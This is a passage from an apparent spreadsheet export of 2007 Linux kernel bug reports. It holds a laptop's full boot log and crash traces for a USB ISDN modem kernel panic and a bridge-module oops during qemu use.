000000000009f000 end: 000000000009f000 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 000000000009f000 size: 0000000000001000 end: 00000000000a0000 type: 2 copy_e820_map() start: 0000000000100000 size: 000000003f591400 end: 000000003f691400 type: 1 copy_e820_map() type is E820_RAM copy_e820_map() start: 000000003f691400 size: 000000000096ec00 end: 0000000040000000 type: 2 copy_e820_map() start: 00000000e0000000 size: 0000000010007000 end: 00000000f0007000 type: 2 copy_e820_map() start: 00000000f0008000 size: 0000000000004000 end: 00000000f000c000 type: 2 copy_e820_map() start: 00000000fec00000 size: 0000000000010000 end: 00000000fec10000 type: 2 copy_e820_map() start: 00000000fed20000 size: 0000000000080000 end: 00000000feda0000 type: 2 copy_e820_map() start: 00000000fee00000 size: 0000000000010000 end: 00000000fee10000 type: 2 copy_e820_map() start: 00000000ffb00000 size: 0000000000500000 end: 0000000100000000 type: 2 BIOS-e820: 0000000000000000 - 000000000009f000 (usable) BIOS-e820: 000000000009f000 - 00000000000a0000 (reserved) BIOS-e820: 0000000000100000 - 000000003f691400 (usable) BIOS-e820: 000000003f691400 - 0000000040000000 (reserved) BIOS-e820: 00000000e0000000 - 00000000f0007000 (reserved) BIOS-e820: 00000000f0008000 - 00000000f000c000 (reserved) BIOS-e820: 00000000fec00000 - 00000000fec10000 (reserved) BIOS-e820: 00000000fed20000 - 00000000feda0000 (reserved) BIOS-e820: 00000000fee00000 - 00000000fee10000 (reserved) BIOS-e820: 00000000ffb00000 - 0000000100000000 (reserved) 118MB HIGHMEM available. 896MB LOWMEM available. Entering add_active_range(0, 0, 259729) 0 entries of 256 used Zone PFN ranges: DMA 0 -&gt; 4096 Normal 4096 -&gt; 229376 HighMem 229376 -&gt; 259729 early_node_map[1] active PFN ranges 0: 0 -&gt; 259729 On node 0 totalpages: 259729 DMA zone: 32 pages used for memmap DMA zone: 0 pages reserved DMA zone: 4064 pages, LIFO batch:0 Normal zone: 1760 pages used for memmap Normal zone: 223520 pages, LIFO batch:31 HighMem zone: 237 pages used for memmap HighMem zone: 30116 pages, LIFO batch:7 DMI 2.4 present. ACPI: RSDP (v000 DELL ) @ 0x000fc1d0 ACPI: RSDT (v001 DELL M07 0x27d60616 ASL 0x00000061) @ 0x3f691a95 ACPI: FADT (v001 DELL M07 0x27d60616 ASL 0x00000061) @ 0x3f692800 ACPI: MADT (v001 DELL M07 0x27d60616 ASL 0x00000047) @ 0x3f693000 ACPI: ASF! (v016 DELL M07 0x27d60616 ASL 0x00000061) @ 0x3f692c00 ACPI: MCFG (v016 DELL M07 0x27d60616 ASL 0x00000061) @ 0x3f692fc0 ACPI: SSDT (v001 PmRef CpuPm 0x00003000 INTL 0x20050624) @ 0x3f691b10 ACPI: DSDT (v001 INT430 SYSFexxx 0x00001001 INTL 0x20050624) @ 0x00000000 ACPI: PM-Timer IO Port: 0x1008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) Processor #0 6:14 APIC version 20 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) Processor #1 6:14 APIC version 20 ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Enabling APIC mode: Flat. Using 1 I/O APICs Using ACPI (MADT) for SMP configuration information Allocating PCI resources starting at 50000000 (gap: 40000000:a0000000) Detected 1197.349 MHz processor. Built 1 zonelists. Total pages: 257700 Kernel command line: root=/dev/mapper/jimmylinux-debian ro single mapped APIC to ffffd000 (fee00000) mapped IOAPIC to ffffc000 (fec00000) Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 PID hash table entries: 4096 (order: 12, 16384 bytes) Console: colour VGA+ 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 1021156k/1038916k available (1640k kernel code, 17004k reserved, 616k data, 200k init, 121412k highmem) virtual kernel memory layout: fixmap : 0xfff4f000 - 0xfffff000 ( 704 kB) pkmap : 0xff800000 - 0xffc00000 (4096 kB) vmalloc : 0xf8800000 - 0xff7fe000 ( 111 MB) lowmem : 0xc0000000 - 0xf8000000 ( 896 MB) .init : 0xc033c000 - 0xc036e000 ( 200 kB) .data : 0xc029a09d - 0xc03343b4 ( 616 kB) .text : 0xc0100000 - 0xc029a09d (1640 kB) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay using timer specific routine.. 2397.77 BogoMIPS (lpj=4795544) Security Framework v1.0.0 initialized SELinux: Disabled at boot. Capability LSM initialized Mount-cache hash table entries: 512 CPU: After generic identify, caps: bfe9fbff 00100000 00000000 00000000 0000c1a9 00000000 00000000 monitor/mwait feature present. using mwait in idle threads. CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 2048K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 0 CPU: After all inits, caps: bfe9fbff 00100000 00000000 00002940 0000c1a9 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. Compat vDSO mapped to ffffe000. Checking 'hlt' instruction... OK. SMP alternatives: switching to UP code ACPI: Core revision 20060707 CPU0: Intel Genuine Intel(R) CPU U2500 @ 1.20GHz stepping 08 SMP alternatives: switching to SMP code Booting processor 1/1 eip 3000 Initializing CPU#1 Calibrating delay using timer specific routine.. 2394.85 BogoMIPS (lpj=4789708) CPU: After generic identify, caps: bfe9fbff 00100000 00000000 00000000 0000c1a9 00000000 00000000 monitor/mwait feature present. CPU: L1 I cache: 32K, L1 D cache: 32K CPU: L2 cache: 2048K CPU: Physical Processor ID: 0 CPU: Processor Core ID: 1 CPU: After all inits, caps: bfe9fbff 00100000 00000000 00002940 0000c1a9 00000000 00000000 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#1. CPU1: Intel Genuine Intel(R) CPU U2500 @ 1.20GHz stepping 08 Total of 2 processors activated (4792.62 BogoMIPS). ENABLING IO-APIC IRQs ..TIMER: vector=0x31 apic1=0 pin1=2 apic2=-1 pin2=-1 checking TSC synchronization across 2 CPUs: CPU#0 had -980012 usecs TSC skew, fixed it up. CPU#1 had 980012 usecs TSC skew, fixed it up. Brought up 2 CPUs migration_cost=84 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: Using MMCONFIG Setting up standard PCI resources ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ LMPWR] OemTableId [ DELLLOM] [20060707] ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 Boot video device is 0000:00:02.0 PCI quirk: region 1000-107f claimed by ICH6 ACPI/GPIO/TCO PCI quirk: region 1080-10bf claimed by ICH6 GPIO PCI: Transparent bridge - 0000:00:1e.0 PCI: Bus #03 (-#06) is hidden behind transparent bridge #02 (-#03) (try 'pci=assign-busses') Please report the result to linux-kernel to fix this permanently ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 9 10 *11) ACPI: PCI Interrupt Link [LNKB] (IRQs *5 7) ACPI: PCI Interrupt Link [LNKC] (IRQs 9 10 11) *3 ACPI: PCI Interrupt Link [LNKD] (IRQs 5 7 9 10 *11) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 *9 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 9 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 *5 6 7 9 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKH] (IRQs *3 4 5 6 7 9 10 11 12 14 15) ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCIE._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.RP01._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.RP02._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PXP0._PRT] Linux Plug and Play Support v0.97 (c) Adam Belay pnp: PnP ACPI init pnp: PnP ACPI: found 14 devices PnPBIOS: Disabled by ACPI PNP PCI: Using ACPI for IRQ routing PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report pnp: 00:02: ioport range 0x4d0-0x4d1 has been reserved pnp: 00:02: ioport range 0x1000-0x1005 could not be reserved pnp: 00:02: ioport range 0x1008-0x100f could not be reserved pnp: 00:03: ioport range 0xf400-0xf4fe has been reserved pnp: 00:03: ioport range 0x1006-0x1007 has been reserved pnp: 00:03: ioport range 0x100a-0x1059 could not be reserved pnp: 00:03: ioport range 0x1060-0x107f has been reserved pnp: 00:03: ioport range 0x1080-0x10bf has been reserved pnp: 00:03: ioport range 0x10c0-0x10df has been reserved pnp: 00:08: ioport range 0xc80-0xcaf has been reserved pnp: 00:08: ioport range 0xcbc-0xcff could not be reserved pnp: 00:08: ioport range 0x910-0x91f has been reserved pnp: 00:08: ioport range 0x920-0x92f has been reserved pnp: 00:08: ioport range 0xcbc-0xcbf has been reserved pnp: 00:08: ioport range 0x930-0x97f has been reserved pnp: 00:0d: ioport range 0xcb0-0xcbb has been reserved PCI: Ignore bogus resource 6 [0:0] of 0000:00:02.0 PCI: Bridge: 0000:00:1c.0 IO window: disabled. MEM window: disabled. PREFETCH window: disabled. PCI: Bridge: 0000:00:1c.1 IO window: disabled. MEM window: dfd00000-dfdfffff PREFETCH window: disabled. PCI: Bridge: 0000:00:1c.2 IO window: disabled. MEM window: dfc00000-dfcfffff PREFETCH window: disabled. PCI: Bus 3, cardbus bridge: 0000:02:01.0 IO window: 00002000-000020ff IO window: 00002400-000024ff PREFETCH window: 50000000-53ffffff MEM window: 54000000-57ffffff PCI: Bridge: 0000:00:1e.0 IO window: 2000-2fff MEM window: dfb00000-dfbfffff PREFETCH window: 50000000-53ffffff ACPI: PCI Interrupt 0000:00:1c.0[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 PCI: Setting latency timer of device 0000:00:1c.0 to 64 ACPI: PCI Interrupt 0000:00:1c.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 PCI: Setting latency timer of device 0000:00:1c.1 to 64 ACPI: PCI Interrupt 0000:00:1c.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:00:1c.2 to 64 PCI: Setting latency timer of device 0000:00:1e.0 to 64 PCI: Enabling device 0000:02:01.0 (0000 -&gt; 0003) ACPI: PCI Interrupt 0000:02:01.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 NET: Registered protocol family 2 IP route cache hash table entries: 32768 (order: 5, 131072 bytes) TCP established hash table entries: 131072 (order: 8, 1048576 bytes) TCP bind hash table entries: 65536 (order: 7, 524288 bytes) TCP: Hash tables configured (established 131072 bind 65536) TCP reno registered checking if image is initramfs... it is Freeing initrd memory: 5234k freed audit: initializing netlink socket (disabled) audit(1170867980.688:1): initialized highmem bounce pool size: 64 pages VFS: Disk quotas dquot_6.5.1 Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) PCI: Setting latency timer of device 0000:00:1c.0 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:1c.0:pcie00] Allocate Port Service[0000:00:1c.0:pcie02] Allocate Port Service[0000:00:1c.0:pcie03] PCI: Setting latency timer of device 0000:00:1c.1 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:1c.1:pcie00] Allocate Port Service[0000:00:1c.1:pcie02] Allocate Port Service[0000:00:1c.1:pcie03] PCI: Setting latency timer of device 0000:00:1c.2 to 64 assign_interrupt_mode Found MSI capability Allocate Port Service[0000:00:1c.2:pcie00] Allocate Port Service[0000:00:1c.2:pcie02] Allocate Port Service[0000:00:1c.2:pcie03] isapnp: Scanning for PnP cards... isapnp: No Plug &amp; Play device found Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 00:0b: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A RAMDISK driver initialized: 16 RAM disks of 8192K size 1024 blocksize PNP: PS/2 Controller [PNP0303:KBC,PNP0f13:PS2M] at 0x60,0x64 irq 1,12 serio: i8042 KBD port at 0x60,0x64 irq 1 serio: i8042 AUX port at 0x60,0x64 irq 12 mice: PS/2 mouse device common for all mice TCP bic registered NET: Registered protocol family 1 NET: Registered protocol family 17 NET: Registered protocol family 8 NET: Registered protocol family 20 Starting balanced_irq Using IPI No-Shortcut mode ACPI: (supports S0 S3 S4 S5) Freeing unused kernel memory: 200k freed input: AT Translated Set 2 keyboard as /class/input/input0 Time: tsc clocksource has been installed. ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu0Ist] [20060707] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu0Cst] [20060707] ACPI: CPU0 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Processor [CPU0] (supports 8 throttling states) ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu1Ist] [20060707] ACPI (exconfig-0455): Dynamic SSDT Load - OemId [ PmRef] OemTableId [ Cpu1Cst] [20060707] ACPI: CPU1 (power states: C1[C1] C2[C2] C3[C3]) ACPI: Processor [CPU1] (supports 8 throttling states) ACPI: Thermal Zone [THM] (66 C) Time: acpi_pm clocksource has been installed. usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb USB Universal Host Controller Interface driver v3.0 ACPI: PCI Interrupt 0000:00:1d.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 PCI: Setting latency timer of device 0000:00:1d.0 to 64 uhci_hcd 0000:00:1d.0: UHCI Host Controller uhci_hcd 0000:00:1d.0: new USB bus registered, assigned bus number 1 uhci_hcd 0000:00:1d.0: irq 20, io base 0x0000bf80 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 2 ports detected Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ACPI: PCI Interrupt 0000:00:1d.1[B] -&gt; GSI 21 (level, low) -&gt; IRQ 21 PCI: Setting latency timer of device 0000:00:1d.1 to 64 uhci_hcd 0000:00:1d.1: UHCI Host Controller uhci_hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2 uhci_hcd 0000:00:1d.1: irq 21, io base 0x0000bf60 usb usb2: configuration #1 chosen from 1 choice hub 2-0:1.0: USB hub found hub 2-0:1.0: 2 ports detected ieee1394: Initialized config rom entry `ip1394' ACPI: PCI Interrupt 0000:00:1d.2[C] -&gt; GSI 22 (level, low) -&gt; IRQ 22 PCI: Setting latency timer of device 0000:00:1d.2 to 64 uhci_hcd 0000:00:1d.2: UHCI Host Controller uhci_hcd 0000:00:1d.2: new USB bus registered, assigned bus number 3 uhci_hcd 0000:00:1d.2: irq 22, io base 0x0000bf40 usb usb3: configuration #1 chosen from 1 choice hub 3-0:1.0: USB hub found hub 3-0:1.0: 2 ports detected ACPI: PCI Interrupt 0000:00:1d.3[D] -&gt; GSI 23 (level, low) -&gt; IRQ 23 PCI: Setting latency timer of device 0000:00:1d.3 to 64 uhci_hcd 0000:00:1d.3: UHCI Host Controller uhci_hcd 0000:00:1d.3: new USB bus registered, assigned bus number 4 uhci_hcd 0000:00:1d.3: irq 23, io base 0x0000bf20 usb usb4: configuration #1 chosen from 1 choice hub 4-0:1.0: USB hub found hub 4-0:1.0: 2 ports detected usb 1-2: new full speed USB device using uhci_hcd and address 2 ACPI: PCI Interrupt 0000:00:1d.7[A] -&gt; GSI 20 (level, low) -&gt; IRQ 20 PCI: Setting latency timer of device 0000:00:1d.7 to 64 ehci_hcd 0000:00:1d.7: EHCI Host Controller ehci_hcd 0000:00:1d.7: new USB bus registered, assigned bus number 5 ehci_hcd 0000:00:1d.7: debug port 1 PCI: cache line size of 32 is not supported by device 0000:00:1d.7 ehci_hcd 0000:00:1d.7: irq 20, io mem 0xffa80000 ehci_hcd 0000:00:1d.7: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 usb usb5: configuration #1 chosen from 1 choice hub 5-0:1.0: USB hub found hub 5-0:1.0: 8 ports detected ACPI: PCI Interrupt 0000:02:01.1[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[17] MMIO=[dfbff800-dfbfffff] Max Packet=[2048] IR/IT contexts=[4/4] ICH7: IDE controller at PCI slot 0000:00:1f.1 ACPI: PCI Interrupt 0000:00:1f.1[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 ICH7: chipset revision 1 ICH7: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xbfa0-0xbfa7, BIOS settings: hda:DMA, hdb:pio Probing IDE interface ide0... usb 1-2: device not accepting address 2, error -71 hda: TOSHIBA MK6008GAH, ATA DISK drive usb 5-8: new high speed USB device using ehci_hcd and address 3 ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 tg3.c:v3.72 (January 8, 2007) ACPI: PCI Interrupt 0000:09:00.0[A] -&gt; GSI 18 (level, low) -&gt; IRQ 18 PCI: Setting latency timer of device 0000:09:00.0 to 64 eth0: Tigon3 [partno(BCM5752KFBG) rev 6002 PHY(5752)] (PCI Express) 10/100/1000Base-T Ethernet 00:15:c5:5b:b4:25 eth0: RXcsums[1] LinkChgREG[1] MIirq[1] ASF[0] Split[0] WireSpeed[1] TSOcap[1] eth0: dma_rwctrl[76180000] dma_mask[64-bit] hda: max request size: 512KiB hda: 117210240 sectors (60011 MB), CHS=16383/255/63, UDMA(100) hda: cache flushes supported hda:&lt;6&gt;usb 5-8: configuration #1 chosen from 1 choice hub 5-8:1.0: USB hub found hub 5-8:1.0: 7 ports detected hda1 hda2 hda3 hda4 &lt; hda5 &gt; ieee1394: Host added: ID:BUS[0-00:1023] GUID[374fc0003abd4450] usb 1-2: new full speed USB device using uhci_hcd and address 4 Probing IDE interface ide1... usb 1-2: configuration #1 chosen from 1 choice hub 1-2:1.0: USB hub found hub 1-2:1.0: 4 ports detected usb 5-8.1: new high speed USB device using ehci_hcd and address 4 usb 5-8.1: configuration #1 chosen from 1 choice SCSI subsystem initialized Initializing USB Mass Storage driver... device-mapper: ioctl: 4.11.0-ioctl (2006-10-12) initialised: dm-devel@redhat.com usb 5-8.7: new low speed USB device using ehci_hcd and address 5 usb 5-8.7: configuration #1 chosen from 1 choice Attempting manual resume usb 1-2.3: new full speed USB device using uhci_hcd and address 5 kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. usb 1-2.3: configuration #1 chosen from 1 choice hub 1-2.3:1.0: USB hub found hub 1-2.3:1.0: 3 ports detected usb 1-2.4: new full speed USB device using uhci_hcd and address 6 usb 1-2.4: configuration #1 chosen from 1 choice scsi0 : SCSI emulation for USB Mass Storage devices usb-storage: device found at 4 usb-storage: waiting for device to settle before scanning usb 1-2.3.2: new full speed USB device using uhci_hcd and address 7 usb 1-2.3.2: configuration #1 chosen from 1 choice usbcore: registered new interface driver usb-storage USB Mass Storage support registered. usbcore: registered new interface driver hiddev input: Logitech USB-PS/2 Optical Mouse as /class/input/input1 input: USB HID v1.10 Mouse [Logitech USB-PS/2 Optical Mouse] on usb-0000:00:1d.7-8.7 usbcore: registered new interface driver usbhid drivers/usb/input/hid-core.c: v2.6:USB HID core driver eth1394: eth1: IEEE-1394 IPv4 over 1394 Ethernet (fw-host0) Linux agpgart interface v0.101 (c) Dave Jones agpgart: Detected an Intel 945GM Chipset. agpgart: Detected 7932K stolen memory. agpgart: AGP aperture is 256M @ 0xc0000000 input: PC Speaker as /class/input/input2 intel_rng: FWH not detected Real Time Clock Driver v1.12ac Yenta: CardBus bridge found at 0000:02:01.0 [1028:01d6] sdhci: Secure Digital Host Controller Interface driver, 0.12 sdhci: Copyright(c) Pierre Ossman Bluetooth: Core ver 2.11 NET: Registered protocol family 31 Bluetooth: HCI device and connection manager initialized Bluetooth: HCI socket layer initialized parport: PnPBIOS parport detected. parport0: PC-style at 0x378 (0x778), irq 7, dma 1 [PCSPP,TRISTATE,COMPAT,ECP,DMA] Yenta: ISA IRQ mask 0x0438, PCI irq 19 Socket status: 30000006 Yenta: Raising subordinate bus# of parent bus (#02) from #03 to #06 pcmcia: parent PCI bridge I/O window: 0x2000 - 0x2fff cs: IO port probe 0x2000-0x2fff: clean. pcmcia: parent PCI bridge Memory window: 0xdfb00000 - 0xdfbfffff pcmcia: parent PCI bridge Memory window: 0x50000000 - 0x53ffffff sdhci: SDHCI controller found at 0000:02:01.2 [1180:0822] (rev 18) ACPI: PCI Interrupt 0000:02:01.2[C] -&gt; GSI 18 (level, low) -&gt; IRQ 18 mmc0: SDHCI at 0xdfbff700 irq 18 DMA ACPI: PCI Interrupt 0000:00:1f.3[B] -&gt; GSI 17 (level, low) -&gt; IRQ 17 Bluetooth: HCI USB driver ver 2.9 usbcore: registered new interface driver hci_usb ACPI: PCI Interrupt 0000:00:1b.0[A] -&gt; GSI 21 (level, low) -&gt; IRQ 21 PCI: Setting latency timer of device 0000:00:1b.0 to 64 input: PS/2 Mouse as /class/input/input3 input: AlpsPS/2 ALPS GlidePoint as /class/input/input4 cs: IO port probe 0x100-0x3af: clean. cs: IO port probe 0x3e0-0x4ff: clean. cs: IO port probe 0x820-0x8ff: clean. cs: IO port probe 0xc00-0xcf7: clean. cs: IO port probe 0xa00-0xaff: clean. scsi 0:0:0:0: CD-ROM HL-DT-ST DVD+-RW GWA4083N B105 PQ: 0 ANSI: 0 usb-storage: device scan complete sr0: scsi3-mmc drive: 24x/24x writer cd/rw xa/form2 cdda tray Uniform CD-ROM driver Revision: 3.20 sr 0:0:0:0: Attached scsi CD-ROM sr0 sr 0:0:0:0: Attached scsi generic sg0 type 5 EXT3 FS on dm-0, internal journal loop: loaded (max 8 devices) kjournald starting. Commit interval 5 seconds EXT3 FS on hda1, internal journal EXT3-fs: mounted filesystem with ordered data mode. kjournald starting. Commit interval 5 seconds EXT3 FS on dm-2, internal journal EXT3-fs: mounted filesystem with ordered data mode. Adding 1572856k swap on /dev/mapper/jimmylinux-debian--swap. Priority:-1 extents:1 across:1572856k pcmcia: Detected deprecated PCMCIA ioctl usage from process: discover. pcmcia: This interface will soon be removed from the kernel; please expect breakage unless you upgrade to new tools. pcmcia: see http://www.kernel.org/pub/linux/utils/kernel/pcmcia/pcmcia.html for details. NET: Registered protocol family 10 lo: Disabled Privacy Extensions PM: Writing back config space on device 0000:09:00.0 at offset 1 (was 100506, writing 100106) ADDRCONF(NETDEV_UP): eth0: link is not ready tg3: eth0: Link is up at 100 Mbps, full duplex. tg3: eth0: Flow control is on for TX and on for RX. ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready eth0: no IPv6 routers present</t>
  </si>
  <si>
    <t>kernel panic when inserting usb isdn modem</t>
  </si>
  <si>
    <t>2007-02-07 12:05 UTC</t>
  </si>
  <si>
    <t>Christian Weiske</t>
  </si>
  <si>
    <t>2007-06-04 13:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: occured always Distribution: Gentoo Hardware Environment: Via Epis 5000 board Software Environment: nothing special Problem Description: I reproducably get a kernel panic when plugging in a usb isdn modem, Billion tiny USB ISDN TA 128). It is said to work with the hfc_usb isdn drivers in the kernel, so I compiled them into it. When plugging the usb cable, I get this: Oops: 0000 [#1] PREEMPT Modules linked in: CPU: 0 EIP: 0060:[&lt;00000000&gt;] Not tainted VLI EFLAGS: 00010046 (2.6.20-rc5 #2) EIP is at 0x0 eax: d5ab6000 ebx: d5ab6a03 ecx: 00000000 edx: 00000112 esi: d5ab6000 edi: 00000005 ebp: c064beec esp: c064bedc ds: 007b es: 007b ss: 0068 Process khubd (pid: 131, ti=c064b000 task=d7dae050 task.ti=d7d97000) Stack: c03a6808 00ab6ac0 d5ab6ac0 d4e2db08 c064bf10 c03a74cc c04b5a49 d7ac1628 00000040 00000002 d4e2db08 d7a9b308 00000000 c064bf28 c034a82f 00000000 d7a9b41c d7aca5a0 d679a3e8 c064bf5c c035e462 c035e600 00000001 c064bf50 Call Trace: [&lt;c010352a&gt;] show_trace_log_lvl+0x1a/0x30 [&lt;c01035fa&gt;] show_stack_log_lvl+0x9a/0xd0 [&lt;c0103846&gt;] show_registers+0x1c6/0x340 [&lt;c0103bc1&gt;] die+0x171/0x230 [&lt;c010f906&gt;] do_page_fault+0x366/0x5b0 [&lt;c04b5f74&gt;] error_code+0x74/0x80 [&lt;c03a74cc&gt;] rx_complete+0x8c/0x150 [&lt;c034a82f&gt;] usb_hcd_giveback_urb+0x3f/0xb0 [&lt;c035e462&gt;] uhci_giveback_urb+0x82/0x1c0 [&lt;c035e63c&gt;] uhci_scan_qh+0x9c/0x240 [&lt;c035e958&gt;] uhci_scan_schedule+0x98/0x130 [&lt;c035f757&gt;] uhci_irq+0xd7/0x180 [&lt;c034a8c5&gt;] usb_hcd_irq+0x25/0x60 [&lt;c0146330&gt;] handle_IRQ_event+0x30/0x70 [&lt;c01473dd&gt;] handle_level_irq+0x7d/0x110 [&lt;c0104fe7&gt;] do_IRQ+0x87/0xd0 [&lt;c010324e&gt;] common_interrupt+0x2e/0x40 [&lt;c0165420&gt;] cache_alloc_debugcheck_after+0xc0/0x180 [&lt;c0165afa&gt;] __kmalloc_track_caller+0xaa/0x100 [&lt;c03f133d&gt;] __alloc_skb+0x4d/0x110 [&lt;c028fff1&gt;] kobject_uevent_env+0x2e1/0x4e0 [&lt;c02901fa&gt;] kobject_uevent+0xa/0x10 [&lt;c03020cf&gt;] device_del+0x8f/0x220 [&lt;c030226b&gt;] device_unregister+0xb/0x20 [&lt;c0350a18&gt;] usb_remove_ep_files+0x58/0x70 [&lt;c035020a&gt;] usb_create_sysfs_intf_files+0xca/0x100 [&lt;c034ce43&gt;] usb_set_configuration+0x313/0x470 [&lt;c0353f16&gt;] generic_probe+0x26/0x80 [&lt;c034d32c&gt;] usb_probe_device+0x4c/0x60 [&lt;c03041f4&gt;] really_probe+0x94/0x110 [&lt;c0304329&gt;] driver_probe_device+0x99/0xd0 [&lt;c0304368&gt;] __device_attach+0x8/0x10 [&lt;c0303619&gt;] bus_for_each_drv+0x49/0x70 [&lt;c03043d6&gt;] device_attach+0x66/0x90 [&lt;c0303861&gt;] bus_attach_device+0x21/0x50 [&lt;c0301d49&gt;] device_add+0x199/0x430 [&lt;c0347233&gt;] __usb_new_device+0x63/0xf0 [&lt;c0347327&gt;] usb_new_device+0x67/0xa0 [&lt;c03482b3&gt;] hub_port_connect_change+0x1c3/0x3d0 [&lt;c034868d&gt;] hub_events+0x1cd/0x3e0 [&lt;c03488b5&gt;] hub_thread+0x15/0x100 [&lt;c012c494&gt;] kthread+0x94/0xc0 [&lt;c0103387&gt;] kernel_thread_helper+0x7/0x10 ======================= Code: Bad EIP value. EIP: [&lt;00000000&gt;] 0x0 SS:ESP 0068:c064bedc &lt;0&gt;Kernel panic - not syncing: Fatal exception in interrupt Steps to reproduce: 1. plug in usb isdn model # ./scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux dojo 2.6.20-rc5 #2 PREEMPT Tue Jan 23 11:39:40 CET 2007 i686 VIA Samuel 2 CentaurHauls GNU/Linux Gnu C 3.4.6 Gnu make 3.81 binutils 2.16.1 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.39 reiserfsprogs 3.6.19 Linux C Library &gt; libc.2.4 Dynamic linker (ldd) 2.4 Procps 3.2.6 Net-tools 1.60 Kbd 1.12 Sh-utils 6.4 udev 103 Modules Loaded</t>
  </si>
  <si>
    <t>oops in port_carrier_check</t>
  </si>
  <si>
    <t>2007-02-07 12:31 UTC</t>
  </si>
  <si>
    <t>Pascal Terjan</t>
  </si>
  <si>
    <t>2007-07-27 23:39 UTC</t>
  </si>
  <si>
    <t>While playing with qemu, I got a oops in bridge (and lost keyboard) : Feb 7 21:20:18 plop kernel: BUG: unable to handle kernel paging request at virtual address 6b6b6b6b Feb 7 21:20:18 plop kernel: printing eip: Feb 7 21:20:18 plop kernel: *pde = 00000000 Feb 7 21:20:18 plop kernel: Oops: 0000 [#1] Feb 7 21:20:18 plop kernel: CPU: 0 Feb 7 21:20:19 plop kernel: EIP: 0060:[pg0+814360305/1067136000] Not tainted VLI Feb 7 21:20:19 plop kernel: EIP: 0060:[&lt;f0eed6f1&gt;] Not tainted VLI Feb 7 21:20:19 plop kernel: EFLAGS: 00010202 (2.6.20.0.rc7-1mdv #1) Feb 7 21:20:19 plop kernel: EIP is at port_carrier_check+0x22/0x75 [bridge] Feb 7 21:20:19 plop kernel: eax: 6b6b6b6b ebx: 6b6b6b6b ecx: 00000000 edx: 00000001 Feb 7 21:20:19 plop kernel: esi: eb99b120 edi: 00000296 ebp: eff0bf58 esp: eff0bf4c Feb 7 21:20:19 plop kernel: ds: 007b es: 007b ss: 0068 Feb 7 21:20:19 plop kernel: Process events/0 (pid: 4, ti=eff0a000 task=eff09530 task.ti=eff0a000) Feb 7 